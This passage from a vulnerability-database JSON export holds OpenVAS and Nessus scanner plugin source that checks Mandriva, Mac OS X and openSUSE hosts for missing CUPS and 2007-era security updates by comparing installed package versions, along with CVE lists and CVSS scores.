Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2007.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.2.10~2.4mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-common\", rpm:\"cups-common~1.2.10~2.4mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-serial\", rpm:\"cups-serial~1.2.10~2.4mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libcups2\", rpm:\"libcups2~1.2.10~2.4mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libcups2-devel\", rpm:\"libcups2-devel~1.2.10~2.4mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cups\", rpm:\"php-cups~1.2.10~2.4mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64cups2\", rpm:\"lib64cups2~1.2.10~2.4mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64cups2-devel\", rpm:\"lib64cups2-devel~1.2.10~2.4mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2007.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.2.4~1.6mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-common\", rpm:\"cups-common~1.2.4~1.6mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-serial\", rpm:\"cups-serial~1.2.4~1.6mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libcups2\", rpm:\"libcups2~1.2.4~1.6mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libcups2-devel\", rpm:\"libcups2-devel~1.2.4~1.6mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cups\", rpm:\"php-cups~1.2.4~1.6mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64cups2\", rpm:\"lib64cups2~1.2.4~1.6mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64cups2-devel\", rpm:\"lib64cups2-devel~1.2.4~1.6mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2008.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~1.3.0~3.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-common\", rpm:\"cups-common~1.3.0~3.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"cups-serial\", rpm:\"cups-serial~1.3.0~3.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libcups2\", rpm:\"libcups2~1.3.0~3.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libcups2-devel\", rpm:\"libcups2-devel~1.3.0~3.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cups\", rpm:\"php-cups~1.3.0~3.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64cups2\", rpm:\"lib64cups2~1.3.0~3.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64cups2-devel\", rpm:\"lib64cups2-devel~1.3.0~3.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:40:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-5855", "CVE-2007-6165", "CVE-2007-1662", "CVE-2007-4768", "CVE-2007-4351", "CVE-2007-5857", "CVE-2007-1661", "CVE-2007-6077", "CVE-2007-4709", "CVE-2007-5848", "CVE-2007-4572", "CVE-2007-5379", "CVE-2007-4710", "CVE-2007-1659", "CVE-2006-0024", "CVE-2007-5856", "CVE-2007-4965", "CVE-2007-5770", "CVE-2007-4708", "CVE-2007-5861", "CVE-2007-1660", "CVE-2007-5476", "CVE-2007-5858", "CVE-2007-5850", "CVE-2007-5116", "CVE-2007-5860", "CVE-2007-3798", "CVE-2007-4131", "CVE-2007-4767", "CVE-2007-5859", "CVE-2007-5851", "CVE-2007-3876", "CVE-2007-5398", "CVE-2007-5854", "CVE-2007-5863", "CVE-2007-4766", "CVE-2007-1218", "CVE-2007-5847", "CVE-2007-5849", "CVE-2007-5853", "CVE-2007-5380"], "description": "The remote host is missing Security Update 2007-009.", "modified": "2019-03-19T00:00:00", "published": "2010-05-12T00:00:00", "id": "OPENVAS:1361412562310102023", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310102023", "type": "openvas", "title": "Mac OS X Security Update 2007-009", "sourceData": "###################################################################\n# OpenVAS Vulnerability Test\n# $Id: macosx_secupd_2007-009.nasl 14307 2019-03-19 10:09:27Z cfischer $\n#\n# Mac OS X Security Update 2007-009\n#\n# LSS-NVT-2010-012\n#\n# Developed by LSS Security Team <http://security.lss.hr>\n#\n# Copyright (C) 2010 LSS <http://www.lss.hr>\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public\n# License along with this program. If not, see\n# <http://www.gnu.org/licenses/>.\n###################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.102023\");\n script_version(\"$Revision: 14307 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-19 11:09:27 +0100 (Tue, 19 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2010-05-12 14:48:44 +0200 (Wed, 12 May 2010)\");\n script_cve_id(\"CVE-2007-4708\", \"CVE-2007-4709\", \"CVE-2007-4710\", \"CVE-2007-5847\", \"CVE-2007-5848\",\n \"CVE-2007-4351\", \"CVE-2007-5849\", \"CVE-2007-5850\", \"CVE-2007-5476\", \"CVE-2007-4131\",\n \"CVE-2007-5851\", \"CVE-2007-5853\", \"CVE-2007-5854\", \"CVE-2007-6165\", \"CVE-2007-5855\",\n \"CVE-2007-5116\", \"CVE-2007-4965\", \"CVE-2007-5856\", \"CVE-2007-5857\", \"CVE-2007-5770\",\n \"CVE-2007-5379\", \"CVE-2007-5380\", \"CVE-2007-6077\", \"CVE-2007-5858\", \"CVE-2007-5859\",\n \"CVE-2007-4572\", \"CVE-2007-5398\", \"CVE-2006-0024\", \"CVE-2007-3876\", \"CVE-2007-5863\",\n \"CVE-2007-5860\", \"CVE-2007-5861\", \"CVE-2007-1218\", \"CVE-2007-3798\", \"CVE-2007-1659\",\n \"CVE-2007-1660\", \"CVE-2007-1661\", \"CVE-2007-1662\", \"CVE-2007-4766\", \"CVE-2007-4767\",\n \"CVE-2007-4768\");\n script_name(\"Mac OS X Security Update 2007-009\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 LSS\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.[45]\\.\");\n\n script_xref(name:\"URL\", value:\"http://support.apple.com/kb/HT2012\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing Security Update 2007-009.\");\n\n script_tag(name:\"affected\", value:\"One or more of the following components are affected:\n\n Address Book\n\n CFNetwork\n\n ColorSync\n\n Core Foundation\n\n CUPS\n\n Desktop Services\n\n Flash Player Plug-in\n\n GNU Tar\n\n iChat\n\n IO Storage Family\n\n Launch Services\n\n Mail\n\n perl\n\n python\n\n Quick Look\n\n ruby\n\n Safari\n\n Safari RSS\n\n Samba\n\n Shockwave Plug-in\n\n SMB\n\n Software Update\n\n Spin Tracer\n\n Spotlight\n\n tcpdump\n\n XQuery\");\n\n script_tag(name:\"solution\", value:\"Update your Mac OS X operating system. Please see the references for more information.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-macosx.inc\");\ninclude(\"version_func.inc\");\n\nssh_osx_name = get_kb_item(\"ssh/login/osx_name\");\nif (!ssh_osx_name) exit (0);\n\nssh_osx_ver = get_kb_item(\"ssh/login/osx_version\");\nif (!ssh_osx_ver || ssh_osx_ver !~ \"^10\\.[45]\\.\") exit (0);\n\nssh_osx_rls = ssh_osx_name + ' ' + ssh_osx_ver;\n\npkg_for_ver = make_list(\"Mac OS X 10.4.11\",\"Mac OS X Server 10.4.11\",\"Mac OS X 10.5.1\",\"Mac OS X Server 10.5.1\");\n\nif (rlsnotsupported(rls:ssh_osx_rls, list:pkg_for_ver)) { security_message( port: 0, data: \"The target host was found to be vulnerable\" ); exit(0);}\n\nif (osx_rls_name(rls:ssh_osx_rls) == osx_rls_name(rls:\"Mac OS X 10.4.11\")) {\n if(version_is_less(version:osx_ver(ver:ssh_osx_rls), test_version:osx_ver(ver:\"Mac OS X 10.4.11\"))) { security_message( port: 0, data: \"The target host was found to be vulnerable\" ); exit(0);}\n else if((ssh_osx_ver == osx_ver(ver:\"Mac OS X 10.4.11\")) && (isosxpkgvuln(fixed:\"com.apple.pkg.update.security.\", diff:\"2007.009\"))) { security_message( port: 0, data: \"The target host was found to be vulnerable\" ); exit(0);}\n}\nif (osx_rls_name(rls:ssh_osx_rls) == osx_rls_name(rls:\"Mac OS X Server 10.4.11\")) {\n if(version_is_less(version:osx_ver(ver:ssh_osx_rls), test_version:osx_ver(ver:\"Mac OS X Server 10.4.11\"))) { security_message( port: 0, data: \"The target host was found to be vulnerable\" ); exit(0);}\n else if((ssh_osx_ver == osx_ver(ver:\"Mac OS X Server 10.4.11\")) && (isosxpkgvuln(fixed:\"com.apple.pkg.update.security.\", diff:\"2007.009\"))) { security_message( port: 0, data: \"The target host was found to be vulnerable\" ); exit(0);}\n}\nif (osx_rls_name(rls:ssh_osx_rls) == osx_rls_name(rls:\"Mac OS X 10.5.1\")) {\n if(version_is_less(version:osx_ver(ver:ssh_osx_rls), test_version:osx_ver(ver:\"Mac OS X 10.5.1\"))) { security_message( port: 0, data: \"The target host was found to be vulnerable\" ); exit(0);}\n else if((ssh_osx_ver == osx_ver(ver:\"Mac OS X 10.5.1\")) && (isosxpkgvuln(fixed:\"com.apple.pkg.update.security.\", diff:\"2007.009\"))) { security_message( port: 0, data: \"The target host was found to be vulnerable\" ); exit(0);}\n}\nif (osx_rls_name(rls:ssh_osx_rls) == osx_rls_name(rls:\"Mac OS X Server 10.5.1\")) {\n if(version_is_less(version:osx_ver(ver:ssh_osx_rls), test_version:osx_ver(ver:\"Mac OS X Server 10.5.1\"))) { security_message( port: 0, data: \"The target host was found to be vulnerable\" ); exit(0);}\n else if((ssh_osx_ver == osx_ver(ver:\"Mac OS X Server 10.5.1\")) && (isosxpkgvuln(fixed:\"com.apple.pkg.update.security.\", diff:\"2007.009\"))) { security_message( port: 0, data: \"The target host was found to be vulnerable\" ); exit(0);}\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:09:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-5855", "CVE-2007-6165", "CVE-2007-1662", "CVE-2007-4768", "CVE-2007-4351", "CVE-2007-5857", "CVE-2007-1661", "CVE-2007-6077", "CVE-2007-4709", "CVE-2007-5848", "CVE-2007-4572", "CVE-2007-5379", "CVE-2007-4710", "CVE-2007-1659", "CVE-2006-0024", "CVE-2007-5856", "CVE-2007-4965", "CVE-2007-5770", "CVE-2007-4708", "CVE-2007-5861", "CVE-2007-1660", "CVE-2007-5476", "CVE-2007-5858", "CVE-2007-5850", "CVE-2007-5116", "CVE-2007-5860", "CVE-2007-3798", "CVE-2007-4131", "CVE-2007-4767", "CVE-2007-5859", "CVE-2007-5851", "CVE-2007-3876", "CVE-2007-5398", "CVE-2007-5854", "CVE-2007-5863", "CVE-2007-4766", "CVE-2007-1218", "CVE-2007-5847", "CVE-2007-5849", "CVE-2007-5853", "CVE-2007-5380"], "description": "The remote host is missing Security Update 2007-009.\n One or more of the following components are affected:\n\n Address Book\n CFNetwork\n ColorSync\n Core Foundation\n CUPS\n Desktop Services\n Flash Player Plug-in\n GNU Tar\n iChat\n IO Storage Family\n Launch Services\n Mail\n perl\n python\n Quick Look\n ruby\n Safari\n Safari RSS\n Samba\n Shockwave Plug-in\n SMB\n Software Update\n Spin Tracer\n Spotlight\n tcpdump\n XQuery", "modified": "2017-02-22T00:00:00", "published": "2010-05-12T00:00:00", "id": "OPENVAS:102023", "href": "http://plugins.openvas.org/nasl.php?oid=102023", "type": "openvas", "title": "Mac OS X Security Update 2007-009", "sourceData": "###################################################################\n# OpenVAS Vulnerability Test\n#\n# Mac OS X Security Update 2007-009\n#\n# LSS-NVT-2010-012\n#\n# Developed by LSS Security Team <http://security.lss.hr>\n#\n# Copyright (C) 2010 LSS <http://www.lss.hr>\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public\n# License along with this program. If not, see\n# <http://www.gnu.org/licenses/>.\n###################################################################\n\ntag_solution = \"Update your Mac OS X operating system.\n\n For more information see:\n http://support.apple.com/kb/HT2012\";\n\ntag_summary = \"The remote host is missing Security Update 2007-009.\n One or more of the following components are affected:\n\n Address Book\n CFNetwork\n ColorSync\n Core Foundation\n CUPS\n Desktop Services\n Flash Player Plug-in\n GNU Tar\n iChat\n IO Storage Family\n Launch Services\n Mail\n perl\n python\n Quick Look\n ruby\n Safari\n Safari RSS\n Samba\n Shockwave Plug-in\n SMB\n Software Update\n Spin Tracer\n Spotlight\n tcpdump\n XQuery\";\n\n\nif(description)\n{\n script_id(102023);\n script_version(\"$Revision: 5394 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-22 10:22:42 +0100 (Wed, 22 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-05-12 14:48:44 +0200 (Wed, 12 May 2010)\");\n script_cve_id(\"CVE-2007-4708\",\"CVE-2007-4709\",\"CVE-2007-4710\",\"CVE-2007-5847\",\"CVE-2007-5848\",\"CVE-2007-4351\",\"CVE-2007-5849\",\"CVE-2007-5850\",\"CVE-2007-5476\",\"CVE-2007-4131\",\"CVE-2007-5851\",\"CVE-2007-5853\",\"CVE-2007-5854\",\"CVE-2007-6165\",\"CVE-2007-5855\",\"CVE-2007-5116\",\"CVE-2007-4965\",\"CVE-2007-5856\",\"CVE-2007-5857\",\"CVE-2007-5770\",\"CVE-2007-5379\",\"CVE-2007-5380\",\"CVE-2007-6077\",\"CVE-2007-5858\",\"CVE-2007-5859\",\"CVE-2007-4572\",\"CVE-2007-5398\",\"CVE-2006-0024\",\"CVE-2007-3876\",\"CVE-2007-5863\",\"CVE-2007-5860\",\"CVE-2007-5861\",\"CVE-2007-1218\",\"CVE-2007-3798\",\"CVE-2007-1659\",\"CVE-2007-1660\",\"CVE-2007-1661\",\"CVE-2007-1662\",\"CVE-2007-4766\",\"CVE-2007-4767\",\"CVE-2007-4768\");\n script_name(\"Mac OS X Security Update 2007-009\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 LSS\");\n script_family(\"Mac OS X Local Security Checks\");\n script_require_ports(\"Services/ssh\", 22);\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\",\"ssh/login/osx_version\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"pkg-lib-macosx.inc\");\ninclude(\"version_func.inc\");\n\nssh_osx_name = get_kb_item(\"ssh/login/osx_name\");\nif (!ssh_osx_name) exit (0);\n\nssh_osx_ver = get_kb_item(\"ssh/login/osx_version\");\nif (!ssh_osx_ver) exit (0);\n\nssh_osx_rls = ssh_osx_name + ' ' + ssh_osx_ver;\n\npkg_for_ver = make_list(\"Mac OS X 10.4.11\",\"Mac OS X Server 10.4.11\",\"Mac OS X 10.5.1\",\"Mac OS X Server 10.5.1\");\n\nif (rlsnotsupported(rls:ssh_osx_rls, list:pkg_for_ver)) { security_message(0); exit(0);}\n\nif (osx_rls_name(rls:ssh_osx_rls) == osx_rls_name(rls:\"Mac OS X 10.4.11\")) {\n if (version_is_less(version:osx_ver(ver:ssh_osx_rls), test_version:osx_ver(ver:\"Mac OS X 10.4.11\"))) { security_message(0); exit(0);}\n else if ((ssh_osx_ver==osx_ver(ver:\"Mac OS X 10.4.11\")) && (isosxpkgvuln(fixed:\"com.apple.pkg.update.security.\", diff:\"2007.009\"))) { security_message(0); exit(0);}\n}\nif (osx_rls_name(rls:ssh_osx_rls) == osx_rls_name(rls:\"Mac OS X Server 10.4.11\")) {\n if (version_is_less(version:osx_ver(ver:ssh_osx_rls), test_version:osx_ver(ver:\"Mac OS X Server 10.4.11\"))) { security_message(0); exit(0);}\n else if ((ssh_osx_ver==osx_ver(ver:\"Mac OS X Server 10.4.11\")) && (isosxpkgvuln(fixed:\"com.apple.pkg.update.security.\", diff:\"2007.009\"))) { security_message(0); exit(0);}\n}\nif (osx_rls_name(rls:ssh_osx_rls) == osx_rls_name(rls:\"Mac OS X 10.5.1\")) {\n if (version_is_less(version:osx_ver(ver:ssh_osx_rls), test_version:osx_ver(ver:\"Mac OS X 10.5.1\"))) { security_message(0); exit(0);}\n else if ((ssh_osx_ver==osx_ver(ver:\"Mac OS X 10.5.1\")) && (isosxpkgvuln(fixed:\"com.apple.pkg.update.security.\", diff:\"2007.009\"))) { security_message(0); exit(0);}\n}\nif (osx_rls_name(rls:ssh_osx_rls) == osx_rls_name(rls:\"Mac OS X Server 10.5.1\")) {\n if (version_is_less(version:osx_ver(ver:ssh_osx_rls), test_version:osx_ver(ver:\"Mac OS X Server 10.5.1\"))) { security_message(0); exit(0);}\n else if ((ssh_osx_ver==osx_ver(ver:\"Mac OS X Server 10.5.1\")) && (isosxpkgvuln(fixed:\"com.apple.pkg.update.security.\", diff:\"2007.009\"))) { security_message(0); exit(0);}\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-17T14:43:26", "description": "This update fixes a buffer overflow that can be exploited by users\nthat are allowed to configure CUPS. (CVE-2007-5848) Additionally a\nbuffer overflow in the SNMP backend of CUPS was fixed that allowed\nremote attackers to execute arbitrary code by sending specially\ncrafted SNMP responses. (CVE-2007-5849) This vulnerability affects\n10.2 and 10.3 only.", "edition": 24, "published": "2008-01-10T00:00:00", "title": "openSUSE 10 Security Update : cups (cups-4806)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-5848", "CVE-2007-5849"], "modified": "2008-01-10T00:00:00", "cpe": ["cpe:/o:novell:opensuse:10.3", "cpe:/o:novell:opensuse:10.2", "p-cpe:/a:novell:opensuse:cups-libs-32bit", "p-cpe:/a:novell:opensuse:cups", "p-cpe:/a:novell:opensuse:cups-libs", "cpe:/o:novell:opensuse:10.1", "p-cpe:/a:novell:opensuse:cups-client", "p-cpe:/a:novell:opensuse:cups-devel"], "id": "SUSE_CUPS-4806.NASL", "href": "https://www.tenable.com/plugins/nessus/29914", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update cups-4806.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(29914);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-5848\", \"CVE-2007-5849\");\n\n script_name(english:\"openSUSE 10 Security Update : cups (cups-4806)\");\n script_summary(english:\"Check for the cups-4806 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes a buffer overflow that can be exploited by users\nthat are allowed to configure CUPS. (CVE-2007-5848) Additionally a\nbuffer overflow in the SNMP backend of CUPS was fixed that allowed\nremote attackers to execute arbitrary code by sending specially\ncrafted SNMP responses. (CVE-2007-5849) This vulnerability affects\n10.2 and 10.3 only.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected cups packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119, 189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cups-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cups-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cups-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cups-libs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/01/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.1|SUSE10\\.2|SUSE10\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.1 / 10.2 / 10.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.1\", reference:\"cups-1.1.23-40.35\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", reference:\"cups-client-1.1.23-40.35\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", reference:\"cups-devel-1.1.23-40.35\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", reference:\"cups-libs-1.1.23-40.35\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", cpu:\"x86_64\", reference:\"cups-libs-32bit-1.1.23-40.35\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", reference:\"cups-1.2.7-12.9\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", reference:\"cups-client-1.2.7-12.9\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", reference:\"cups-devel-1.2.7-12.9\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", reference:\"cups-libs-1.2.7-12.9\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", cpu:\"x86_64\", reference:\"cups-libs-32bit-1.2.7-12.9\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"cups-1.2.12-22.6\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"cups-client-1.2.12-22.6\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"cups-devel-1.2.12-22.6\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"cups-libs-1.2.12-22.6\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", cpu:\"x86_64\", reference:\"cups-libs-32bit-1.2.12-22.6\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cups\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:43:26", "description": "This update fixes a buffer overflow that can be exploited by users\nthat are allowed to configure CUPS. (CVE-2007-5848)", "edition": 23, "published": "2008-01-10T00:00:00", "title": "SuSE 10 Security Update : cups (ZYPP Patch Number 4805)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-5848"], "modified": "2008-01-10T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_CUPS-4805.NASL", "href": "https://www.tenable.com/plugins/nessus/29913", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(29913);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-5848\");\n\n script_name(english:\"SuSE 10 Security Update : cups (ZYPP Patch Number 4805)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related 